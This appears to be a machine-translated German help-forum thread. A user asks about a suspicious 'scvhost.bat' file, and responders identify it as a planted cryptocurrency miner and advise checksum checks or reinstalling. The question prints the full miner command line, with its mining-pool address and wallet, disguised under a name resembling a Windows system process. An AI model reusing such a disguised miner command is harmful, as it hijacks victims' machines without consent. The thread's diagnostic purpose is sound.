Ist das scvhost.bat mit cryptonight ein Virus oder Miner?

17

Ich habe gerade diese .bat-Datei mit dem Namen scvhost.bat gefunden. Die Datei enthielt den folgenden Inhalt:

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

Ist das ein Virus (um Informationen zu stehlen usw.) oder ein gepflanzter Bergmann? Ich mache mir Sorgen, da ich mich auch mit Kryptowährungen beschäftige und stratumes sich um eine Währung handelt, die in der obigen Datei erwähnt ist.

windows batch-file malware cryptomining NewbieProgrammer
quelle
1
Dies scheint in der Tat ein Bergmann zu sein. Angesichts der Tatsache, dass Sie selbst Kryptowährungen verwenden, stellen Sie sicher, dass dies nicht Teil dessen ist, was Sie für meine verwenden. Sie können dies tun, indem Sie die Erweiterung .bat in etwas anderes umbenennen und prüfen, ob Sie sie nach einem Neustart normalerweise noch abrufen können. Eine Sache, die ich an dieser Datei merkwürdig finde, ist, dass sie sich normalerweise selbst nennt, wenn man bedenkt, dass scvhost sowohl der Name dessen ist, was sie ausführt, als auch die bat-Datei. Normalerweise würde dies zu einer Schleife führen.
LPChip
2
@VirtualAnomaly Ich denke, Sie sind sVChost mit sCVhost hier erwähnt verwechselt. Ja, mir ist sehr bewusst, dass svchost die Mechanik für Hosting-Dienste ist.
LPChip
2
@LPChip Entschuldigung, Sie haben Recht, ich habe mich geirrt.
Virtuelle Anomalie
2
Jemand hat wohl zu viel Starcraft gespielt.
CodesInChaos
1
@lucidbrot SCVs sind die "Builder" -Einheit eines der Rennen (Terraner) des Spiels. In diesem Fall steht sie für "Space Construction Vehicle".
Aaron

Antworten:

34

Dies scheint eine Art Mining-Funktion zu sein, zumal der Parameter die URL zu einem Mining-Pool enthält. Sie müssen jedoch sicher sein, was in der Binärdatei enthalten ist. Es ist sinnvoll, die Prüfsummen der von Ihnen gefundenen Binärdatei Ihres Systems mit den vom Entwicklerteam des Miners erstellten Releases zu vergleichen. Wenn sie sich unterscheiden; Betrachten Sie Ihr System als unsicher.

Ein weiteres Problem ist, dass Sie von diesem Miner erfahren haben (wahrscheinlich, weil er viel CPU verbraucht hat), aber Sie wissen nicht, was sonst noch auf Ihrem System passiert ist. Wenn ein Eindringling den Minenarbeiter starten könnte, hätte er auch andere Dinge starten können. Es ist möglicherweise eine gute Idee, das Backup wiederherzustellen oder trotzdem eine Neuinstallation durchzuführen.

mtak
quelle